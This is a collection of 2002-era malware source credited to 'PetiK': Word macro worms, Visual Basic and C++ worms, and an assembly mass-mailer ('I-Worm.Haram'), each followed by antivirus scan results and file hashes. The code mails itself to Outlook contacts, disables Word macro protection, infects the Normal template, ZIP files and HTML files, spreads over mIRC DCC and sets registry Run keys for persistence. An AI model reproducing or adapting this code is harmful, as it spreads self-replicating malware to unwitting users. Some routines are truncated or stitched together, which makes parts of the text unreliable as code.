Print #1, "If env.To <> """" Then"
Print #1, "env.Send"
Print #1, "End If"
Print #1, "Next"
Print #1, "End If"
Print #1, "Next"
Print #1, "WScript.Quit"
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", reg) = nfile
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "W97M.AutoSpread.A coded by PetiK (c)2002"
.Heading = "W97M.AutoSpread"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With
slp = Sleep(5000)
End Sub
76406570.vbs
'From W97M.AutoSpread
On Error Resume Next
Set out=CreateObject("Outlook.application")
Set map=out.GetNameSpace("MAPI")
For Each C in map.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set E=C.AddressEntries(D)
Set env=out.CreateItem(0)
env.To=E.Address
env.Subject="HelloWorld"
env.Body="This confidential document is for you."
env.Attachments.Add("C:\PetiK\W32.HLLW.RLF\HelloWorld.doc")
env.DeleteAfterSubmit=True
If env.To <> "" Then
env.Send
End If
Next
End If
Next
WScript.Quit
File AutoSpread.doc received on 05.16.2009 10:45:28 (CET)
Additional information
File size: 40960 bytes
MD5...: b7f7ed86d457fec2493db21e8886b981
SHA1..: 5f1c2e11b84ac3df1e06f9dc290c3706735b8065
/*
Name : I-Worm.Archiver
Author : PetiK
Date : Mai 10th 2002 -
Language : C++
*/
#include <windows.h>
#include <stdio.h>
#include <mapi.h>
#pragma argused
#pragma inline
char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
char *fnam[]={"news","support","info","newsletter","webmaster"};
char
*fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@virusli
st.com"};
LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell
Folders";
char attname[]="news_xxxxxxxx.exe";
LPTSTR cmdLine,ptr;
BOOL installed;
BYTE desktop[50],favoris[50],personal[50],winzip[50];
DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
DWORD type=REG_SZ;
long i;
LHANDLE session;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
HKEY hReg;
WIN32_FIND_DATA ffile;
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
GetModuleFileName(hInst,filen,100);
GetSystemDirectory((char *)sysdir,100);
GetWindowsDirectory((char *)copyn,100);
strcpy(windir,copyn);
strcat(copyn,"\\Archiver.exe");
installed=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
case 'p':
ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance -
(c)2002",
"I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
ExitProcess(0);
break;
}
}
}
if(!installed) {
CopyFile(filen,copyn,FALSE);
strcpy(copyreg,copyn);
strcat(copyreg," -i");
/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg); */
ExitProcess(0);
}
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App
Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
RegCloseKey(hReg);
if(strlen(winzip)!=0) {
infzip(windir);
infzip(sysdir);
infzip(desktop);
infzip(personal);
infzip(favoris);
infzip("C:\\");
}
/*
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
for(i=0;i<8;i++)
attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
fsubj[0]=0;
wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);
mes->ulReserved=0;
mes->lpszSubject=fsubj;
mes->lpszNoteText="This is some news send by our firm about security.\n"
"Please read by clicking on attached file.\n"
"\tBest Regards";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filen;
mes->lpFiles->lpszFileName=attname;
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
*/
ExitProcess(0);
}
void infzip(char *folder)
{
register bool abc=TRUE;
register HANDLE fh;
if(strlen(folder)!=0) {
SetCurrentDirectory(folder);
fh=FindFirstFile("*.zip",&ffile);
if(fh!=INVALID_HANDLE_VALUE) {
while(abc) {
inzip[0]=0;
wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
WinExec(inzip,1);
abc=FindNextFile(fh,&ffile);
}
}
}
}
File Archiver.exe received on 05.16.2009 10:45:20 (CET)
Additional information
File size: 23040 bytes
MD5...: 6079048134255a415e569a57402d7c56
SHA1..: 35867a4491825a6c2557e6103cb6164705d6328d
SHA256: f88aec37d60795ac97b73574b674bbf40bd8466dac54a33b1e1a8c0df8035391
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : W97M.ApiWord
' Author : PetiK
' Language : VBA Word
' Date : 14/05/2002
VB_Name = "ApiWord"
Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long)
Private Declare Function CopyFile& Lib "kernel32" Alias "CopyFileA" (ByVal
lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As
Boolean)
Private Declare Function CreateDirectory& Lib "kernel32" Alias "CreateDirectoryA" (ByVal
lpszCrDir As String, ByVal secu As Long)
Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal
dwReserved As Long)
Private Declare Function ShowCursor& Lib "user32" (ByVal fshow As Boolean)
Private Declare Function SwapMouseButton& Lib "user32" (ByVal bSwap As Long)
Private Declare Function WritePrivateProfileString& Lib "kernel32" Alias
"WritePrivateProfileStringA" _
(ByVal lpszSection As String, ByVal lpszKey As String, _
ByVal lpszString As String, ByVal lpszFile As String)
Sub AutoOpen()
slp = Sleep(1000)
winp = Environ("windir")
crd = CreateDirectory(winp + "\ApiSystem", 0)
cp = CopyFile(ActiveDocument.FullName, winp + "\ApiSystem\HelloU.doc", False)
Call endprotect
Call infdoc
Call SrchF
Call PayLoad
End Sub
Sub HelpAbout()
MsgBox "System must be shutdown.", vbCritical, "Warning"
ext = ExitWindowsEx(2, 0)
End Sub
Sub SrchF()
On Error Resume Next
winp = Environ("windir")
infile = winp + "\ApiSystem\AboutU.ini"
MS = "HKEY_LOCAL_MACHINE\Software\Microsoft\ApiWord"
If System.PrivateProfileString("", MS, "Send Info") <> "OK" Then
CV = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
nom = System.PrivateProfileString("", CV, "RegisteredOwner")
ent = System.PrivateProfileString("", CV, "RegisteredOrganization")
ver = System.PrivateProfileString("", CV, "Version")
vern = System.PrivateProfileString("", CV, "VersionNumber")
pi = System.PrivateProfileString("", CV, "ProductId")
pk = System.PrivateProfileString("", CV, "ProductKey")
pf = System.PrivateProfileString("", CV, "ProgramFilesDir")
sp = System.PrivateProfileString("", _
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page")
End Sub
Sub infdoc()
On Error Resume Next
winp = Environ("windir")
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
DropFile = winp + "\ApiSystem\src.txt"
If Nor.Item("ApiWord").Name <> "ApiWord" Then
Doc("ApiWord").Export DropFile
Nor.Import DropFile
End If
If Doc.Item("ApiWord").Name <> "ApiWord" Then
Nor("ApiWord").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
End Sub
Sub endprotect()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub
Sub PayLoad()
num = Int((Rnd * 10) + 1)
If num = 1 Then
sm = SwapMouseButton(&H2)
ElseIf num = 5 Then
sc = ShowCursor(False)
slp = Sleep(10000)
sc = ShowCursor(True)
End If
End Sub
File ApiWord.doc received on 05.16.2009 10:45:11 (CET)
Additional information
File size: 37888 bytes
MD5...: 0b6d3ba97c607d4c334e45fda1907912
SHA1..: 826552b0aa5837a1c4c205d8c980d103deaafc01
' Name : W32.HLLW.Visual
' Author : PetiK
' Language : Visual Basic
' Date : 19/05/2002
'
'
'
'
Attribute VB_Name = "Module1"
Sub Main()
On Error Resume Next
Set fso = CreateObject("Scripting.FilesystemObject")
Set ws = CreateObject("WScript.Shell")
orig = App.Path & "\" & App.EXEName & ".exe"
cop = fso.GetSpecialFolder(1) & "\kern32dll.exe"
FileCopy orig, cop
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\kern32dll", cop
fso.CreateFolder ("C:\Backup")
ncopy = ""
For I = 1 To 10
Randomize (Timer)
ncopy = ncopy + Chr(Int(Rnd() * 26) + 97)
Next I
FileCopy orig, "C:\Backup\" & ncopy & ".exe"
Call inf(ws.SpecialFolders("MyDocuments"))
Sub inf(folder)
Set fso = CreateObject("Scripting.FilesystemObject")
Set ws = CreateObject("WScript.Shell")
orig = App.Path & "\" & App.EXEName & ".exe"
Set dire = fso.GetFolder(folder)
Set fc = dire.Files
For Each f1 In fc
ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
oext = LCase(f1.Name)
If (ext <> "vbs") Then
If (Right(oext, 8) <> "old_.exe") Then
'MsgBox oext, vbInformation, Right(oext, 8)
FileCopy orig, f1.Path & "old_.exe"
End If
End If
Next
End Sub
File Visual.exe received on 05.16.2009 19:47:59 (CET)
Additional information
File size: 9216 bytes
MD5...: b2ff3ada6672ac9266a6fac5842ae706
SHA1..: 93d70d8a36a4139f494fe82fb8d418104a72a899
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : W32.HLLW.Lili
' Author : PetiK
' Language : Visual Basic
' Date : 31/05/2002
Sub Main()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Call CopyWorm
Call inf(App.Path)
Call inf(ws.SpecialFolders("MyDocuments"))
Call inf(fso.GetSpecialFolder(0))
Call inf(fso.GetSpecialFolder(1))
Call inf(fso.GetSpecialFolder(2))
Sub CopyWorm()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
orig = App.Path
If Right(orig, 1) <> "\" Then orig = orig & "\"
orig = orig & App.EXEName & ".exe"
copywrm = fso.GetSpecialFolder(0)
If Right(copywrm, 1) <> "\" Then copywrm = copywrm & "\"
For I = 1 To 8
Randomize (Timer)
ncopy = ncopy + Chr(Int(Rnd() * 26) + 97)
Next I
copywrm = copywrm & ncopy & ".exe"
FileCopy orig, copywrm
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NewName", copywrm
Call WritePrivateProfileString("rename", "NUL", orig, "WININIT.INI")
FileCopy orig, "C:\XXXPic.exe"
Sub inf(dir)
On Error Resume Next
orig = ""
orig = App.Path
If Right(orig, 1) <> "\" Then orig = orig & "\"
orig = orig & App.EXEName & ".exe"
End Sub
File Liliworm.exe received on 05.16.2009 17:43:19 (CET)
Additional information
File size: 37376 bytes
MD5...: fce1de67fd47f4b6b67ab7eba0bf4246
SHA1..: bc50ef3b75ee04316ce9e24ba5707ba21ad308a1
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment *
Name : I-Worm.Haram
Author : PetiK
Language : win32asm
Date : May 13th 2002 - June 1st 2002
- On the 10th, payload : open and close CD door and display a messagebox in
loop
.586p
.model flat
.code
JUMPS
include win32api.inc
LF equ 10
CR equ 13
CRLF equ <13,10>
@endsz macro
local nxtchr
nxtchr: lodsb
test al,al
jnz nxtchr
endm
api macro a
extrn a:proc
call a
endm
WIN32_FIND_DATA struct
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
WIN32_FIND_DATA ends
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS
start: pushad
@SEH_SetupFrame <jmp end_worm>
hide_the_worm:
call hide_worm
get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA
get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,'nuF\'
stosd
mov eax,'aGyn'
stosd
mov eax,'e.em'
stosd
mov eax,'ex'
stosd
pop edi
copy_worm:
push 1
push edi
push esi
api CopyFileA
test eax,eax
je ok_copy
push 50
push edi
push 1
@pushsz "Haram"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
push 50
push offset msgwrm
push esi
api GetFileTitleA
push 10h
push offset msgwrm
@pushsz "ERROR : this file is not a valid Win32 file."
push 0
api MessageBoxA
ok_copy:
call inf_doc_personal
get_startup_path:
push 0
push 7
push offset startup
push 0
api SHGetSpecialFolderPathA
push offset startup
api SetCurrentDirectoryA
call cr_vbsname
payload:
mov eax,offset sysTime
push eax
api GetSystemTime
lea eax,sysTime
cmp word ptr [eax+6],10
jne end_payload
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door open"
api mciSendStringA
push 500
api Sleep
xor eax,eax
push eax
push eax
push eax
@pushsz "set CDAudio door closed"
api mciSendStringA
push 40h
@pushsz "I-Worm.Haram"
@pushsz "Coded by PetiK - ©2002 - France"
push 0
api MessageBoxA
api GetTickCount
push 10000
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
push ecx
api Sleep
jmp payload
end_payload:
call inf_process
end_worm:
@SEH_RemoveFrame
popad
push 0
api ExitProcess
hide_worm Proc
pushad
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset cpywrm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP
inf_doc_personal Proc
pushad
get_personal_folder:
push 0
push 5
push offset personal
push 0
api SHGetSpecialFolderPathA
push offset personal
api SetCurrentDirectoryA
fff_doc:
push offset ffile
@pushsz "*.doc"
api FindFirstFileA
inc eax
je end_f_doc
dec eax
mov [hfind],eax
cr_file:
push offset ffile.cFileName
push offset new_file
api lstrcpy
mov esi,offset new_file
push esi
api lstrlen
add esi,eax
sub esi,4 ; to become \SYSTEM\Wsock32
mov [esi],"mth."
lodsd
push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_file
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
fnf_doc:
push offset ffile
push [hfind]
api FindNextFileA
test eax,eax
jne cr_file
push [hfind]
api FindClose
end_f_doc:
popad
ret
inf_doc_personal EndP
inf_process Proc
popad
create_folder:
push 0
@pushsz "C:\backup"
api CreateDirectoryA
@pushsz "C:\backup"
api SetCurrentDirectoryA
enum_process:
push 0
push 2
api CreateToolhelp32Snapshot
mov lSnapshot,eax
inc eax
je end_inf_process
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
check_process:
test eax,eax
jz end_process
push ecx
mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextProcess
lea ebx,[uProcess.szExeFile]
push ebx
push offset new_name
api lstrcpy
mov edi,offset new_name
push edi
api lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push offset new_name
@pushsz "System.htm"
api lstrcmp
test eax,eax
jz NextProcess
push 0
push 1
push 2
push 0
push 1
push 40000000h
push offset new_name
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_htm - s_htm
push offset s_htm
push ebp
api WriteFile
push ebp
api CloseHandle
NextProcess:
push offset uProcess
push lSnapshot
api Process32Next
jmp check_process
end_process:
push lSnapshot
api CloseHandle
end_inf_process:
pushad
ret
inf_process EndP
cr_vbsname Proc
mov edi,offset vbsname
; api GetTickCount
push 10
pop ecx
; xor edx,edx
; div ecx
; inc edx
; mov ecx,edx
name_g:
push ecx
api GetTickCount
push '9'-'0'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'0'
stosb
api GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
api Sleep
pop ecx
loop name_g
mov eax,"sbv."
stosd
ret
cr_vbsname EndP
.data
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)
s_mirc: db "[script]",CRLF
db ";Don't edit this file.",CRLF,CRLF
db "n0=on 1:JOIN:{",CRLF
db "n1= /if ( $nick == $me ) { halt }",CRLF
db "n2= /.dcc send $nick "
mirc_exe db 50 dup (?)
db CRLF,"n3=}",0
e_mirc:
s_htm: db '<haram>',CRLF
db '<html><head><title>Windows Media Player</title></head><body>',CRLF
db '<script language=VBScript>',CRLF
db 'On Error Resume Next',CRLF
db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF
db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF
db 'If err.number=429 Then',CRLF
db 'kupfkvqg.Run javascript:location.reload()',CRLF
db 'Else',CRLF,CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF
db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF
db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF
db 'End If',CRLF,CRLF
db 'Function glvqglvb(dir)',CRLF
db 'If upfkupfk.FolderExists(dir) Then',CRLF
db ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF
db ' Set bbblvqgl=bbbbbbbb.Files',CRLF
db ' For each lvqgvqgl in bbblvqgl',CRLF
db ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF
db ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
db ' htmorg=rhmwrrhm.ReadAll()',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Set mwrrhmwr=document.body.createTextRange',CRLF
db ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF
db ' rhmwrrhm.WriteLine "<haram>"',CRLF
db ' rhmwrrhm.Write(htmorg)',CRLF
db ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' Else',CRLF
db ' rhmwrrhm.Close()',CRLF
db ' End If',CRLF
db ' End If',CRLF
db ' Next',CRLF
db 'End If',CRLF
db 'End Function',CRLF
db '</script></body></html>',0
e_htm:
ends
end start
HARAM.HTM
<haram>
<html><head><title>Windows Media Player</title></head><body>
<script language=VBScript>
On Error Resume Next
MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"
Set upfkupfk=CreateObject("Scripting.FileSystemObject")
Set kupfkvqg=CreateObject("WScript.Shell")
If err.number=429 Then
kupfkvqg.Run javascript:location.reload()
Else
glvqglvb(upfkupfk.GetSpecialFolder(0))
glvqglvb(upfkupfk.GetSpecialFolder(1))
glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))
glvqglvb(kupfkvqg.SpecialFolders("Desktop"))
glvqglvb(kupfkvqg.SpecialFolders("Favorites"))
glvqglvb(kupfkvqg.SpecialFolders("Fonts"))
End If
Function glvqglvb(dir)
If upfkupfk.FolderExists(dir) Then
Set bbbbbbbb=upfkupfk.GetFolder(dir)
Set bbblvqgl=bbbbbbbb.Files
For each lvqgvqgl in bbblvqgl
lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))
If lvqglvqr="htm" or lvqglvqr="html" Then
Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
if rhmwrrhm.ReadLine <> "<haram>" Then
rhmwrrhm.Close()
Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)
htmorg=rhmwrrhm.ReadAll()
rhmwrrhm.Close()
Set mwrrhmwr=document.body.createTextRange
Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)
rhmwrrhm.WriteLine "<haram>"
rhmwrrhm.Write(htmorg)
rhmwrrhm.WriteLine mwrrhmwr.htmltext
rhmwrrhm.Close()
Else
rhmwrrhm.Close()
End If
End If
Next
End If
End Function
</script></body></html>
HARAM.VBS
Additional information
File size: 5192 bytes
MD5...: 722436ae848608575bdf5d7036f3d1a9
SHA1..: ca97b2f3ef477f327875b1373f14a34b88b565c6
PEiD..: PEtite v2.2
File Haram.htm received on 05.16.2009 11:58:32 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.15 -
AntiVir 7.9.0.168 2009.05.15 VBS/Navigator.2
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 VBS/Navigator.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Bother
BitDefender 7.2 2009.05.16 VBS.Navigator.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.83
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Rophage.B
F-Prot 4.4.4.56 2009.05.15 VBS/Navigator.A
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Navigator
Fortinet 3.117.0.0 2009.05.16 HTML/Vierka.A
GData 19 2009.05.16 VBS.Navigator.A
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Navigator
McAfee 5616 2009.05.15 W32/PetTick
McAfee+Artemis 5616 2009.05.15 W32/PetTick
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Navigator.2
Microsoft 1.4602 2009.05.16 Virus:VBS/Navigator.gen
NOD32 4080 2009.05.15 VBS/Petik
Norman 6.01.05 2009.05.16 VBS/Navigator.F
nProtect 2009.1.8.0 2009.05.16 VBS.Haram.A@mm
Panda 10.0.0.14 2009.05.16 W32/Petik.U.worm
PCTools 4.4.2.0 2009.05.15 VBS.Ngator.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 -
Sophos 4.41.0 2009.05.16 W32/Petik-Y
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETTICK.Y
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Ngator.A
Additional information
File size: 1571 bytes
MD5...: b358dde6d08d84cf4571df91509df185
SHA1..: bdec927521e2209aee0783b72b970b2211fb2d51
File Haram.vbs received on 05.16.2009 11:58:35 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.15 VBS/Petik
AntiVir 7.9.0.168 2009.05.15 VBS/Navigator.1
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 Heuristic-31
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Randa
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.D5290353
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.84
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Mailworm1
F-Prot 4.4.4.56 2009.05.15 Heuristic-31
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Pica.X@mm
GData 19 2009.05.16 Generic.ScriptWorm.D5290353
Ikarus T3.1.1.49.0 2009.05.16 VBS.Lee.Based
K7AntiVirus 7.10.735 2009.05.14 VBS.Generic.MassMailer
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick.vbs
